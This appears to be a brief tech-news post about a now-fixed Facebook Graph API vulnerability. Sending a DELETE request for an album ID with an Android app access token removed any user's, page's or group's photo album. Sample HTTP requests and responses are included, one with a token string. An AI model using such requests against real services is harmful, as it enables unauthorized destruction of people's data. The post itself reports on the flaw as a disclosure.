This vulnerability allowed (it was fixed recently) malicious users to delete any photo album available on Facebook. This exploit of the Facebook Graph API allowed hackers to delete any photo album owned by a user or a page or group from Facebook.

The main utility of the Facebook Graph API is to allow developers to read and write the users data. At this moment, all applications from Facebook are using Graph API. The Graph API is using an access token to read or write data.

According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.

According to Laxman Muthiyah, deleting photos is not possible using graph explorer access token:

Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-
{“error”:{“message”:”(#200) Application does not have the capability to make this API call.”,”type”:”OAuthException”,”code”:200}}

But, Laxman discovered that the delete option is available if you’re using mobile access token:

Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=< Facebook_for_Android_Access_Token >

Response :-
true

You can see this Facebook vulnerability explained in the below video:

You can find more information regarding this vulnerability on this page.